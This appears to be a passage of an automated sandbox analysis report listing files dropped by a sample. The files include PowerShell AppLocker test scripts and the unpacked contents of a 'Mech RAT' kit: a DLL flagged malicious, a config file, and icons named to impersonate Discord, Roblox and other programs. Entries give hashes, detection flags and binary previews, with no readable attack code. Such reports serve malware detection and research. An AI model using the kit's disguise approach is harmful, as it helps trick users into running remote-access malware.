                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvm2f5nq.c24.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x2f0rpli.rmq.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zcawnhwe.1e4.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zy5hglte.q2d.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\BouncyCastle.Crypto.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):3316968
                                                                                    Entropy (8bit):6.532906510598102
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:JIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9Y:6BbBWIgWljGxRB/LLY
                                                                                    MD5:0CF454B6ED4D9E46BC40306421E4B800
                                                                                    SHA1:9611AA929D35CBD86B87E40B628F60D5177D2411
                                                                                    SHA-256:E51721DC0647F4838B1ABC592BD95FD8CB924716E8A64F83D4B947821FA1FA42
                                                                                    SHA-512:85262F1BC67A89911640F59A759B476B30CA644BD1A1D9CD3213CC8AAE16D7CC6EA689815F19B146DB1D26F7A75772CEB48E71E27940E3686A83EB2CF7E46048
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: PVUfopbGfc.exe, Detection: malicious, Browse
                                                                                    • Filename: OqAVRCkQ3T.exe, Detection: malicious, Browse
                                                                                    • Filename: PVUfopbGfc.exe, Detection: malicious, Browse
                                                                                    • Filename: OqAVRCkQ3T.exe, Detection: malicious, Browse
                                                                                    • Filename: mapMd1URzq.exe, Detection: malicious, Browse
                                                                                    • Filename: mnFHs2DuKg.exe, Detection: malicious, Browse
                                                                                    • Filename: External.exe, Detection: malicious, Browse
                                                                                    • Filename: newvideozones.click.ps1, Detection: malicious, Browse
                                                                                    • Filename: use_2024_t#U043e_#U043epen.zip, Detection: malicious, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R............" ..0..r2..........&1.. ....2...... ........................2.....6Q3...@.................................G&1.O.....2..............|2.. ....2.....X.(.p............................................ ............... ..H............text....p2.. ...r2................. ..`.rsrc.........2......t2.............@..@.reloc........2......z2.............@..B................{&1.....H...........$....................(.....................................V!........s.........*.~....-*(....o....o....o.........~....-.~.........~....*..( ...*...0..G.......(!....o"....s.1....s*,..%..(.... ....o.....o 0...Zo....t....o8(..(....*..0..$..........(.....(....o.....(!.......io#...*z...(....(!....o"...o....(....*..0............T....r...p.(O....o$....(....*..0..I.......sG...sB)..s.(..s.(...(....s6(....,..o%....2...(....sV(....+.....%..ox...*..( ...*V.(&.....}......}..

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Client.exe.config

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):176
                                                                                    Entropy (8bit):4.975948294614847
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:vFWWMNHUqoyELAz5cIMOoIRuQVK/FNURAmIRMNHjFHr0lUfEyhTRtaKWREBAW4QA:TMVBjzGIffVKNC7VJdfEyFRtUuAW4QIT
                                                                                    MD5:DC77BDB7FBF40A24BAAE4FDC78B72F44
                                                                                    SHA1:33F43AC03CFD4CBEF328AD131272250EEF029D42
                                                                                    SHA-256:40FA7D2CF05768C2C660556ED04AE1A2615B02516EC1B059778E065B0B259043
                                                                                    SHA-512:734752575B9B82E1A1EB838720811C272C0962AE99205B543E95940590EC476428CE201C9FB8BADA57ADDE186C3CB9E47A088C62BBE1C0B1C0F0083AF3B9463D
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" standalone="yes"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />.. </startup>..</configuration>

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\CM Stolen ICO.ico

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 1 icon, 256x256, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):270398
                                                                                    Entropy (8bit):4.5120637222906375
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:jUxtMIvpnIX79rXlSrLFGjLnfQ7KSa/ES6ATR6Wsv76Jm:IxaQpnIx567KP8S6ASv
                                                                                    MD5:0E5C95BD5D3F9AE7084C0A03F58C3F83
                                                                                    SHA1:9D65BA00FE59C149802D720890CA556E4A9B5660
                                                                                    SHA-256:78BD9885FC0A2AC15C16C0A54F4ADA9FE60FFB5CE9529FE4BBD2A6E448E01173
                                                                                    SHA-512:852FACBCB874A468626C4E7A769FFFE37BE9F1E3697B791DFE03958F50160699B4833250D1B96463900B0DE558AE926381F9A11681AA176F82F630A866C2F71A
                                                                                    Malicious:false
                                                                                    Preview:............ .( ......(............. .........'...'................................................................................................................................................... .........................""".&&&.&&&.$$$.............................................................................................................................................................+++.HHH.ddd.yyy.........zzz.xxx.xxx.uuu.mmm.ccc.ZZZ.UUU.VVV.WWW.OOO.UUU.HHH.(((. .666.555.(((...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\Discord Stolen ICO.ico

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 1 icon, 64x64, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):16958
                                                                                    Entropy (8bit):3.1707565992614586
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:MFSDngMp7jxrH8WdTZyHAD3AKK+luRD0TRXDwPaHG:WcpPxN93+ZDSUam
                                                                                    MD5:F2B9AF71FD5CF7C2DA55BB60DFD24312
                                                                                    SHA1:AB09967BD37C24B7890ACC69A574292880E24CC2
                                                                                    SHA-256:07FD7AFACCFC448E4CD58AC4A60811E72586B10EF78055EE4D37699ED5AAA3F2
                                                                                    SHA-512:0E83EE23ADBF56C89ECFC7B7F50B63FB2BA8530EEB13B1414F8EA000B64F3352BD9DD192ADB1D8C00A9AFD19663C44DAEA288D866CF6E1D18748E0677D07F4EC
                                                                                    Malicious:false
                                                                                    Preview:......@@.... .(B......(...@......... ......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................|....6.H.P.P.H.6...~............................................................................................................................................................................................................Z.............................Z........

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\Mech ICO.ico

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 1 icon, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):42406
                                                                                    Entropy (8bit):7.982008950741705
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:/OxiQ16OumQNpQdHUftQVu2UXRViJopWsVEaTpZIfA2oAgPjb3lMrRtw5iqlzNf:ciQuXQA0u2UhgJmWETbIIx6Ylzd
                                                                                    MD5:21443C51CB5B3381690F0BDF2153D895
                                                                                    SHA1:A415F520B1D51D3BA0917069616634EDC39CCB10
                                                                                    SHA-256:962344871E6094E827937AD6308346F6FE74A454A9B6851A72DB23A5F4F5C800
                                                                                    SHA-512:29BCE1D1CD4BB7CC06F3F4B4CF29929EF45A86FC2E758AA9FBD09AB8CD4F3BDFFDCC0FF9266F6421B2B39188824B91515F24DA62E83E0EF62ED57188A2BE99AB
                                                                                    Malicious:false
                                                                                    Preview:............ ..........PNG........IHDR.............\r.f....IDATx...W.$.......v..#Rk.L .@B#!...X.. .b.lvU....9..3g.m...>.>.....%........ .$..."u&Rgh."\....s.077s7..L.d\..G...v.~.O...k0...S.U...Z.......:.v`..a.kcm8.,0....."0..........'.o...g...........`7...Y.A...}.6..C..[Z.].I.,p....y.(....sC...................@.........H...q...X.).y`...x...).J..N.........C...#.-..>....................*0c=.z..u....k.>./.....k{`m....b......?...'..:.8.....;1.y.k.ym...CbJ..0.._/ XU..m!~.7...Q`=...6...hm$.......&(.pj..`U.`w-..*....;1E...6.....#...3...V..6...&..0..=k.mm..U.:.+.....3.`E .l...........?......X......L.z..J......L..\... .....#....%!....X...CX.Kp=.m:.;....:.+_.".h+ ~......~.J.~...# :.",.m..k .6.....dR"3...f`0...l........3.Y.T....] ...".2...f....(..eHA...@.V ."(........? ..?2'a..9.9....c.0C.*A.+..s........S.O......<7../.....E.@. ..D.@..D.@.U......6.....T>...c.@NK.4?'....rA..Tp.....R......[Z._`. ...b.kC.4P6(([.?..D.b.2....F.k...*.o.i.S&....S:rN..^Y.].....o..@S/..].P

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\Mech2.png

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):10442
                                                                                    Entropy (8bit):7.605403323027397
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:icwaX5VXjXZNpcH/sxs6pjox6en5CHSGn4MefYx53hoehTsWRPJLOx4wYOIxVUKH:icwqXFNM/sx5pjox6enQHJnreQJJTsAf
                                                                                    MD5:D7E21DD77BD1903D5CB570A052EC7D50
                                                                                    SHA1:49225383472138809F6CE22C024A823C0C5781CA
                                                                                    SHA-256:17EAC031FC6220B4B5FD5D9D6743DBBF428FBAC280D9BBF80CF8988DF68E001C
                                                                                    SHA-512:4ECE91BD40B8DDA8CE9ADF6AAB86EB504A78B9929EE1DEB1D25159BE229C836C9BFDEEAC6C1C8A454992583C317394155FEC0B00B51449C275EB50C1DDC2CA4A
                                                                                    Malicious:false
                                                                                    Preview:.PNG........IHDR..............x......pHYs..........o.d....tEXtSoftware.www.inkscape.org..<... .IDATx...k.]U...{....&&..Z. ...........rT ..9...;.k.....xD..........{..v{...CRU...H.5...*&$uX.j...1..w].PC......x........................................................................................................................................................................................................+x.H....?..#...&..w. W...K.?.s..Z....rlj.%.,.jy.@Nl.Q*.......(...z.H...e:O...;..#...$]..#....w..Q.P.....L..:B1\xGH...e[o:.$..@NL.WJ..;GLzC.....l'H...C.yi}R..)bR...l..T..J.T.....m..y.H......M..S.90..C..s...rP.P.....C..;Alz.........3.%...I.6x.......".Zz.Z..@.F?!q.....P........<....$.........M.s.S.)2..%..z.M.)d...e...JA.f..@..m.g.1x._.^\..m5...H.I-)l...#...C.@..Jc.....e.....N...'.......2.K.{f..<.(...u..4..;....xW.U.9..$....,...#...C.i....S.7..-F)(....0.@.8F{>........E.^......{....s.-....F.`.. .#.a.`.(...z...!....VH..;G...\....D...;..'. i.w.XY.dm.@.(....8.9.xo,..

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\Roblox Modern Stolen.ico

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 1 icon, 256x256, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):270398
                                                                                    Entropy (8bit):4.471581894685283
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:WhxL0cMzogYX2KGQRIruG3bw1VULvPj0aZujHL+aJ+Q0Zrh3333333tR333333Sx:icihOZcTzJKfGX7i4KKD3Zd
                                                                                    MD5:318504965C865DE5C19AE4F26CFAB2B4
                                                                                    SHA1:80424240F013F8EA3FC61C7FD96F9D3E8834684E
                                                                                    SHA-256:307F5FD5C70F367E7F8F07AB3D28C44E1E3E4998CE80CA84A7C3CEA1898EBC52
                                                                                    SHA-512:444BD7606517692175EF0574EDD09F050D72C265FE9A70A78892691ECA68AECCC3648ECD6F5C8D343BEBCD1EB6673D2FC5970A8333109221EB81D7E38351C797
                                                                                    Malicious:false
                                                                                    Preview:............ .( ......(............. .........'...'.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\XWorm Stolen ICO.ico

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 1 icon, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):37847
                                                                                    Entropy (8bit):7.983005948303856
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:X3A0BkL6hIkAbbT9jdJmZ2F1+ZoZd8DADi27GIjlvfWjKR68pbwuo7:9W6e3hv10ct1wK48pU
                                                                                    MD5:9D5FF9DC2B7F487DA684F928D4CF8614
                                                                                    SHA1:DC2608CF5E0F3396393489767BF2AA4C848F6224
                                                                                    SHA-256:42C78DD9D053C047633B9D1A826E7804533F259B4645816EFF67D052781B8DC6
                                                                                    SHA-512:6DF81190728F011F644623C0279E6414B05EA51FF5C9AC1A7C7877F3E5FA31604287CB01702B78B0DB63A02A4CA1ABF235520B1F1E038981C95287269CCF307E
                                                                                    Malicious:false
                                                                                    Preview:............ ..........PNG........IHDR.............\r.f....IDATx..}w..W....u..&.hI.dY..gp..cL4...#...w........#..#.#.c.s.9..eK..,.J.;3...G..=....V.?c.....t..W.[..:..t.#..HG:..t.#..HG:..t.#..HG:..t.#..HG:..t.#..HG:...B...n......o5..f..h._......5...E.M...z'7U..mJD`U..W....lE..~$.....].[.uOn.?k.vnsG:......^....h.. =.j.....G.[_.yh..C.iO.Z.....4U&x..1.f.Z..DU....&.^.j"....%2..>.......A..a..X.........Hu..<n0.tNw...z.>}..iO.o.....-.:K^2wf.@t.c..E~..b\........|z..........6.y.._P.?...A.N.,...h...x..[cm.P.T..E..BU."..J..@. UxL......"0...%.Ba!..,.............;l.V..{t._{.....o..:w.~O.W.....V..Sg..s.vV.8..~.....c.-.V..^..[...[>:!Y.......[...PjB..70{n..9.................a(.D..F.M....AK.Df.T..&....B. ..N..@PU...b.W$......U.N..`......k&$.b....[.%7..."R....7..'=.....}.}..Y;4...m:}..w...+.t.M.C...<............2..Y.5..nAKh....U(..Y>3......e+..~8.....J n..uN.m.=.....m.j.o,..?x}k.....CiQ@-.w..0#6.&;]..P.n(.D.RSb.4....J..2.O.;y.f.........2X..d...G...nU.K...._n.

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\icon (1).ico

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 5 icons, 48x48, 32 bits/pixel, 64x64, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):99678
                                                                                    Entropy (8bit):4.223791582668927
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:RBrn6a7/Zu/M615kfNOfEK3EpQkGhD94TtcmeVQU71qiLSeznFkKeUqvllR/t6c1:RBz65/M6If+3Js+3JFkKeTn1
                                                                                    MD5:4F409511E9F93F175CD18187379E94CB
                                                                                    SHA1:598893866D60CD3A070279CC80FDA49EE8C06C9B
                                                                                    SHA-256:115F0DB669B624D0A7782A7CFAF6E7C17282D88DE3A287855DBD6FE0F8551A8F
                                                                                    SHA-512:0D1F50243A3959968174AA3FD8F1A163946E9F7E743CBB2C9EF2492073F20DA97949BF7D02C229096B97482FF725C08406E2E9AA72C820489535758470CF604F
                                                                                    Malicious:false
                                                                                    Preview:......00.... ..%..V...@@.... .(B...%........ .h...&h.. .... ......l........ .(...6}..(...0...`..... ......$.........................................................".......7...=...?...;...2...&...................................................$...?...B...............................................................................................,d>6e.]P..eW..ra.p`.j[.[O.b<4....R...F...2.....................................RGO.q..n..OE....U...@...(........................................................................... .aS..}k..r.................q..vf..WK. ..b...F...*.........................PDR.r........p..ud.`;3....P...9... ............................................................oF<@.}m..|......................................{..ue.jA8....P...1.................eVp.u.....................|l..cV.8".p...J...3.....................................................YKM.v.....................................................xg..VJ....R...0.........k\..

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\icon (10).ico

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 6 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):118209
                                                                                    Entropy (8bit):5.0290982507103505
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:VDRRKECMsn3H2GkmPe3KUDlGEJ57ukb8rJXAtnvWrpLDvZ8EZN:tjls3WGkoe6Uso9T8r9AtnertLFN
                                                                                    MD5:AD1740CB3317527AA1ACAE6E7440311E
                                                                                    SHA1:7A0F8669ED1950DB65632B01C489ED4D9ABA434E
                                                                                    SHA-256:7A97547954AAAD629B0563CC78BCA75E3339E8408B70DA2ED67FA73B4935D878
                                                                                    SHA-512:EEE7807B78D4DD27B51CEE07A6567E0D022180E007E1241266F4C53F1192C389BE97332FCD9F0B8FDA50627B40B8CF53027872304A68A210F4D754AA0243B0C2
                                                                                    Malicious:false
                                                                                    Preview:............ .SH..f......... .(....H..@@.... .(B...P..00.... ..%...... .... ............... .h...Y....PNG........IHDR.............\r.f..H.IDATx..y..U.........o.B.}.......eI.(dP.m..7..8....2..D..@PPq.\X.V..@.dOHw...~..u~.T..u..z...|>...S.9....=.E0. ..QP..,B2...,E..."...@......H.R..a. .>...N$..... .T...;'*.....BT..E.........E...............0I.)Od......... %@.......`.B>......b.9..........e+.5..q.Fv..NE..uQ.^._...v.....+.c.?...|^^97Qi....F..........\...`...L.6..g...B......h..N.~...]..C.yY...('.n..w.(..G.X........_.7.8.0.0R.!/..Ui.......@l..g...g.mH.....Y....u./.l..@..I...c...)...w......~....B..^.J.l...&c..W.\L.<1..$........r.:..o......!...#p....tK~.*...,.*B.G.}.NR.r..K..g.B.P3B..h...&$u..F..4..h...H".....H!I.1`..00...L.c...!.D.A..\.H-.G.Pq.j..w...DA...?..."Y...........#.o#.$.Z..@......hC. M.F$M@-B*..7...KB.h....a.C0.O2.......O..&.$RMBL..{.M..._............].M..A`....FX..2.i.L.......+.... v..r.\=...........!T?.!........R~...m..@...[...SW..V;...

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\icon (11).ico

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 1 icon, 48x48
                                                                                    Category:dropped
                                                                                    Size (bytes):9662
                                                                                    Entropy (8bit):5.357535365414906
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:hc4i1w+DSf0RxO/Csg9nL2CupMqM4pSg36IfgT9A+QdwhFKQfkIvxIm3sW88H:qa+DSf0RxOQnLjoSg3hfG5/X8cOO88H
                                                                                    MD5:1C2CEA154DEEDC5A39DAEC2F1DADF991
                                                                                    SHA1:6B130D79F314FA9E4015758DEA5F331BBE1E8997
                                                                                    SHA-256:3B64B79E4092251EBF090164CD2C4815390F34849BBD76FB51085B6A13301B6D
                                                                                    SHA-512:DCEEBC1E6FDFE67AFEBAEF1AFF11DD23EDA6FAE79EB6B222DE16EDEBDFEBD8E45DE896E501608254FB041824080CB41C81AC972032638407EFC6BFEB930BFD00
                                                                                    Malicious:false
                                                                                    Preview:......00.......%......(...0...`..... ..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... %!.*9+@...%....................................................................................................................................................................................4L7A.O...1.....6................................................................................................................................................................................4^9p.d...5...7.....M...(......................................................

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\icon (12).ico

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 1 icon, 48x48
                                                                                    Category:dropped
                                                                                    Size (bytes):9662
                                                                                    Entropy (8bit):3.5584691731100597
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:8mEKEEjOjzSId77Fe0ggzSXlYtAMXa77gieRHw9S1IId:HUNdsgzS1EAEaHB8IId
                                                                                    MD5:4EA9AB789F5AE96766E3F64C8A4E2480
                                                                                    SHA1:423CB762CE81FAB3B2B4C9066FE6EA197D691770
                                                                                    SHA-256:84B48CA52DFCD7C74171CF291D2EF1247C3C7591A56B538083834D82857FEE50
                                                                                    SHA-512:F917059B6F85E4A25909A27CAD38B1EF0659161C32DF54860226FF3D858127D8DA592EA9072AD41D5A9986DD8C04A37E9AD34E2251883A8C2F0933E6AA201414
                                                                                    Malicious:false
                                                                                    Preview:......00.......%......(...0...`..... ......%...................................................................................................................................................................................................................................C.P.=...8...2...2...?...O...N...N...O...P...P...Q...Q...Q...O...O...O...P...O...P...P...P...P...P...Q...Q...Q...Q...Q...R...R...Q...P...Q...N...7...>...D..)O.?.................................`...V...X...X...X...X...X...Y...Y...Y...Y...Z...Z...Z...Z...Z...Z...Z...Z...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[..._......................................8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8......................................?.........................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\icon (13).ico

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 6 icons, 256x256, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):370070
                                                                                    Entropy (8bit):2.1535405973266575
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:AyIh9xb9bexqcmOg1/JuiiiiiilllllioiiiilllliiiiiuGxbu:9Ih9Z91hJy
                                                                                    MD5:E6FEC4185B607E01A938FA405E0A6C6C
                                                                                    SHA1:565E72809586E46700B74931E490E2DC1E7E3DB1
                                                                                    SHA-256:2E2F17B7DD15007192E7CBBD0019355F8BE58068DC5042323123724B99AE4B44
                                                                                    SHA-512:13DAEB2BF124E573590359F18A1D962157DC635A88319C9ED1A2E8CCAD6322FB081579E1E8FBE62FFE55C8286C2BC8ACB251D572A4BEB00641AD5009A380E513
                                                                                    Malicious:false
                                                                                    Preview:............ .( ..f......... .h.... ..00.... ..%...$.. .... ......J........ .(...F[..@@.... .(B..nc..(............. ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\icon (14).ico

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 6 icons, 256x256, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):370070
                                                                                    Entropy (8bit):2.1516742045936668
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:FY9tDXICTUj6Q+CUsn2JiAAA/////////A+AA////////AAAiA////kujYYFsG3I:+PMXT0
                                                                                    MD5:0C24EDEC606ABDA7C6570B7DCF439298
                                                                                    SHA1:4478A102892E5EB4BB1DA8E9C62D17724965691A
                                                                                    SHA-256:8FC693238AFC49A8098DAC1762BFAE891E818BB84749C6EEF5F1B0C6C8FFDDB2
                                                                                    SHA-512:F8DE3FFB8F9FE1394B3626AE5616213D4612B43F0635FA9053D74AC6FE536657E796289487F245B8ABFF74F1DE8368C0DF8E56BF21F540366ED86A378649EA24
                                                                                    Malicious:false
                                                                                    Preview:............ .( ..f......... .h.... ..00.... ..%...$.. .... ......J........ .(...F[..@@.... .(B..nc..(............. ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\icon (15).ico

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 6 icons, 256x256, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):370070
                                                                                    Entropy (8bit):2.1196393199521024
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:0nnnnnnnnnnnnnnnnnnnnnnnQInU2/gohN/yRUZZZZZZZZZZZaaa0KaaILjeuFgZ:Rkccckccccct
                                                                                    MD5:E3143E8C70427A56DAC73A808CBA0C79
                                                                                    SHA1:63556C7AD9E778D5BD9092F834B5CC751E419D16
                                                                                    SHA-256:B2F57A23ECC789C1BBF6037AC0825BF98BABC7BF0C5D438AF5E2767A27A79188
                                                                                    SHA-512:74E0F4B55625DF86A87B9315E4007BE8E05BBECCA4346A6EA06EF5B1528ACB5A8BB636EF3E599A3820DBDDCF69563A0A22E2C1062C965544FD75EC96FD9803FC
                                                                                    Malicious:false
